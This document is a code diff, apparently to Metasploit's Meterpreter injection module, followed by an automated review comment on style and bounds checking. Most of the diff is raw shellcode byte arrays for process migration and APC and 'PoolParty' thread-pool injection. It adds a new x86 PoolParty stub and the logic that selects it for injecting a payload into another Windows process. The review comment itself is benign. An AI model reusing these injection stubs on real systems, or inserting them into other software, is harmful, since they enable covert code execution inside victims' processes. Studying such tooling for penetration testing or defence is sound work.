55#include "../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
66#include <tlhelp32.h>
77
8- // see '/msf3 /external/source/shellcode/x86/migrate/executex64.asm'
8+ // see '/msf /external/source/shellcode/windows/ x86/src /migrate/executex64.asm'
99// 03.06.2017: fixed an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484
1010// found and fixed by ReWolf, incorporated by RaMMicHaeL
1111BYTE migrate_executex64 [] = {0x55 ,0x89 ,0xE5 ,0x56 ,0x57 ,0x8B ,0x75 ,0x08 ,0x8B ,0x4D ,0x0C ,0xE8 ,0x00 ,0x00 ,0x00 ,0x00
@@ -15,7 +15,7 @@ BYTE migrate_executex64[] = {0x55,0x89,0xE5,0x56,0x57,0x8B,0x75,0x08,0x8B,0x4D,0
1515 ,0xD6 ,0x5F ,0x50 ,0xC7 ,0x44 ,0x24 ,0x04 ,0x23 ,0x00 ,0x00 ,0x00 ,0x89 ,0x3C ,0x24 ,0xFF ,0x2C
1616 ,0x24 };
1717
18- // see '/msf3 /external/source/shellcode/x64/migrate/remotethread.asm'
18+ // see '/msf /external/source/shellcode/windows/ x64/src /migrate/remotethread.asm'
1919BYTE migrate_wownativex [] = {0xFC ,0x48 ,0x89 ,0xCE ,0x48 ,0x89 ,0xE7 ,0x48 ,0x83 ,0xE4 ,0xF0 ,0xE8 ,0xC8 ,0x00 ,0x00 ,0x00
2020 ,0x41 ,0x51 ,0x41 ,0x50 ,0x52 ,0x51 ,0x56 ,0x48 ,0x31 ,0xD2 ,0x65 ,0x48 ,0x8B ,0x52 ,0x60 ,0x48
2121 ,0x8B ,0x52 ,0x18 ,0x48 ,0x8B ,0x52 ,0x20 ,0x48 ,0x8B ,0x72 ,0x50 ,0x48 ,0x0F ,0xB7 ,0x4A ,0x4A
@@ -36,7 +36,7 @@ BYTE migrate_wownativex[] = {0xFC,0x48,0x89,0xCE,0x48,0x89,0xE7,0x48,0x83,0xE4,0
3636 ,0x00 ,0x00 ,0x00 ,0x00 ,0xEB ,0x0A ,0x48 ,0xB8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
3737 ,0x48 ,0x83 ,0xC4 ,0x50 ,0x48 ,0x89 ,0xFC ,0xC3 };
3838
39- // see '/msf3 /external/source/shellcode/x86/migrate/apc.asm'
39+ // see '/msf /external/source/shellcode/windows/ x86/src /migrate/apc.asm'
4040BYTE apc_stub_x86 [] = {0xFC ,0x8B ,0x74 ,0x24 ,0x04 ,0x55 ,0x89 ,0xE5 ,0xE8 ,0x89 ,0x00 ,0x00 ,0x00 ,0x60 ,0x89 ,0xE5
4141 ,0x31 ,0xD2 ,0x64 ,0x8B ,0x52 ,0x30 ,0x8B ,0x52 ,0x0C ,0x8B ,0x52 ,0x14 ,0x8B ,0x72 ,0x28 ,0x0F
4242 ,0xB7 ,0x4A ,0x26 ,0x31 ,0xFF ,0x31 ,0xC0 ,0xAC ,0x3C ,0x61 ,0x7C ,0x02 ,0x2C ,0x20 ,0xC1 ,0xCF
@@ -54,7 +54,7 @@ BYTE apc_stub_x86[] = {0xFC,0x8B,0x74,0x24,0x04,0x55,0x89,0xE5,0xE8,0x89,0x00,0
5454 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
5555 ,0x00 ,0x00 ,0x00 ,0x00 };
5656
57- // see '/msf3 /external/source/shellcode/x64/migrate/apc.asm'
57+ // see '/msf /external/source/shellcode/windows/ x64/src /migrate/apc.asm'
5858BYTE apc_stub_x64 [] = {0xFC ,0x80 ,0x79 ,0x10 ,0x00 ,0x0F ,0x85 ,0x13 ,0x01 ,0x00 ,0x00 ,0xC6 ,0x41 ,0x10 ,0x01 ,0x48
5959 ,0x83 ,0xEC ,0x78 ,0xE8 ,0xC8 ,0x00 ,0x00 ,0x00 ,0x41 ,0x51 ,0x41 ,0x50 ,0x52 ,0x51 ,0x56 ,0x48
6060 ,0x31 ,0xD2 ,0x65 ,0x48 ,0x8B ,0x52 ,0x60 ,0x48 ,0x8B ,0x52 ,0x18 ,0x48 ,0x8B ,0x52 ,0x20 ,0x48
@@ -77,7 +77,7 @@ BYTE apc_stub_x64[] = {0xFC,0x80,0x79,0x10,0x00,0x0F,0x85,0x13,0x01,0x00,0x00,0
7777 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
7878 ,0x00 ,0x00 ,0x00 };
7979
80- // see '/msf3 /external/source/shellcode/x64/migrate/poolparty.asm'
80+ // see '/msf /external/source/shellcode/windows/ x64/src /migrate/poolparty.asm'
8181BYTE poolparty_stub_x64 [] = {0xFC ,0x55 ,0x57 ,0x56 ,0x48 ,0x89 ,0xE7 ,0xE9 ,0x01 ,0x01 ,0x00 ,0x00 ,0x5E ,0x48 ,0x83 ,0xEC
8282 ,0x78 ,0xE8 ,0xC8 ,0x00 ,0x00 ,0x00 ,0x41 ,0x51 ,0x41 ,0x50 ,0x52 ,0x51 ,0x56 ,0x48 ,0x31 ,0xD2
8383 ,0x65 ,0x48 ,0x8B ,0x52 ,0x60 ,0x48 ,0x8B ,0x52 ,0x18 ,0x48 ,0x8B ,0x52 ,0x20 ,0x48 ,0x8B ,0x72
@@ -97,6 +97,21 @@ BYTE poolparty_stub_x64[] = {0xFC,0x55,0x57,0x56,0x48,0x89,0xE7,0xE9,0x01,0x01,0
9797 ,0x38 ,0x68 ,0x0D ,0x16 ,0xFF ,0xD5 ,0x48 ,0x89 ,0xFC ,0x5E ,0x5F ,0x5D ,0xC3 ,0xE8 ,0xFA ,0xFE
9898 ,0xFF ,0xFF };
9999
100+ // see '/msf/external/source/shellcode/windows/x86/src/migrate/poolparty.asm'
101+ BYTE poolparty_stub_x86 [] = {0x55 ,0x53 ,0x57 ,0x56 ,0x89 ,0xe6 ,0xfc ,0xe9 ,0xbd ,0x00 ,0x00 ,0x00 ,0x5d ,0x6a ,0xff ,0xff
102+ ,0x73 ,0x10 ,0x68 ,0x08 ,0x87 ,0x1d ,0x60 ,0xff ,0xd5 ,0x31 ,0xff ,0x57 ,0x57 ,0xff ,0x73 ,0x08
103+ ,0xff ,0x33 ,0x57 ,0x57 ,0x68 ,0x38 ,0x68 ,0x0d ,0x16 ,0xff ,0xd5 ,0x89 ,0xf4 ,0x5e ,0x5f ,0x5b
104+ ,0x5d ,0xc3 ,0xe8 ,0xd5 ,0xff ,0xff ,0xff ,0x60 ,0x89 ,0xe5 ,0x31 ,0xd2 ,0x64 ,0x8b ,0x52 ,0x30
105+ ,0x8b ,0x52 ,0x0c ,0x8b ,0x52 ,0x14 ,0x8b ,0x72 ,0x28 ,0x0f ,0xb7 ,0x4a ,0x26 ,0x31 ,0xff ,0x31
106+ ,0xc0 ,0xac ,0x3c ,0x61 ,0x7c ,0x02 ,0x2c ,0x20 ,0xc1 ,0xcf ,0x0d ,0x01 ,0xc7 ,0x49 ,0x75 ,0xef
107+ ,0x52 ,0x57 ,0x8b ,0x52 ,0x10 ,0x8b ,0x42 ,0x3c ,0x01 ,0xd0 ,0x8b ,0x40 ,0x78 ,0x85 ,0xc0 ,0x74
108+ ,0x4c ,0x01 ,0xd0 ,0x50 ,0x8b ,0x48 ,0x18 ,0x8b ,0x58 ,0x20 ,0x01 ,0xd3 ,0x85 ,0xc9 ,0x74 ,0x3c
109+ ,0x49 ,0x8b ,0x34 ,0x8b ,0x01 ,0xd6 ,0x31 ,0xff ,0x31 ,0xc0 ,0xac ,0xc1 ,0xcf ,0x0d ,0x01 ,0xc7
110+ ,0x38 ,0xe0 ,0x75 ,0xf4 ,0x03 ,0x7d ,0xf8 ,0x3b ,0x7d ,0x24 ,0x75 ,0xe0 ,0x58 ,0x8b ,0x58 ,0x24
111+ ,0x01 ,0xd3 ,0x66 ,0x8b ,0x0c ,0x4b ,0x8b ,0x58 ,0x1c ,0x01 ,0xd3 ,0x8b ,0x04 ,0x8b ,0x01 ,0xd0
112+ ,0x89 ,0x44 ,0x24 ,0x24 ,0x5b ,0x5b ,0x61 ,0x59 ,0x5a ,0x51 ,0xff ,0xe0 ,0x58 ,0x5f ,0x5a ,0x8b
113+ ,0x12 ,0xeb ,0x83 ,0x5b ,0xe8 ,0x69 ,0xff ,0xff ,0xff ,0xe8 ,0xf5 ,0xff ,0xff ,0xff };
114+
100115/*
101116 * Attempt to gain code execution in the remote process via a call to ntdll!NtQueueApcThread
102117 * Note: Windows Server 2008R2 can blue screen if you use APC injection to inject into another sessions csrss.exe
@@ -526,12 +541,21 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW
526541
527542 do
528543 {
529-
544+ if (poolparty == NULL )
545+ {
546+ BREAK_WITH_ERROR ("[INJECT][inject_via_poolparty] The pool party could not be initialized" , ERROR_INVALID_FUNCTION );
547+ }
548+
530549 if (dwDestinationArch == PROCESS_ARCH_X64 && (dwMeterpreterArch == PROCESS_ARCH_X64 || dwMeterpreterArch == PROCESS_ARCH_X86 )) {
531550 dprintf ("[INJECT][inject_via_poolparty] using: poolparty_stub_x64" );
532551 lpStub = & poolparty_stub_x64 ;
533552 dwStubSize = sizeof (poolparty_stub_x64 );
534553 }
554+ else if (dwDestinationArch == PROCESS_ARCH_X86 && dwMeterpreterArch == PROCESS_ARCH_X86 ) {
555+ dprintf ("[INJECT][inject_via_poolparty] using: poolparty_stub_x86" );
556+ lpStub = & poolparty_stub_x86 ;
557+ dwStubSize = sizeof (poolparty_stub_x86 );
558+ }
535559 else {
536560 BREAK_WITH_ERROR ("[INJECT][inject_via_poolparty] Can't inject on this target (yet)!" , ERROR_INVALID_FUNCTION );
537561 }
@@ -567,6 +591,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW
567591#ifdef DEBUGTRACE
568592 char * VARIANT_POS_TO_STR [POOLPARTY_TECHNIQUE_COUNT ] = {
569593 "POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION" ,
594+ "POOLPARTY_TECHNIQUE_WORKER_FACTORY_OVERWRITE" ,
570595 };
571596 dprintf ("[INJECT][inject_via_poolparty] Attempting injection with variant %s" , VARIANT_POS_TO_STR [variant ]);
572597#endif
@@ -715,4 +740,4 @@ DWORD inject_dll(DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuffer, DWORD
715740 CloseHandle (hProcess );
716741
717742 return dwResult ;
718- }
743+ }
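Review bot: The new `poolparty_stub_x86` table (gutter lines 101–113) writes its bytes in lowercase hex (`0xe6`, `0xfc`, `0xff`) while the four stubs above it use uppercase (`0xE5`, `0xFC`, `0xFF`); normalize the new table to uppercase so all five blobs follow one convention and can be diffed against regenerated output without noise. Because a byte blob cannot be reviewed by reading it, the `// see '.../x86/src/migrate/poolparty.asm'` comment would be more useful if it also recorded how the bytes were produced from that source (assembler and options, or the source revision). In the `inject_via_poolparty` hunk, the `DEBUGTRACE` table `VARIANT_POS_TO_STR[POOLPARTY_TECHNIQUE_COUNT]` gains a second string and is indexed by `variant` with no bounds check; the count and the variant values are defined outside this hunk, so this presumably relies on them being kept in sync with this list — worth confirming when the enum changes. `inject_via_poolparty` begins and ends outside the visible hunks.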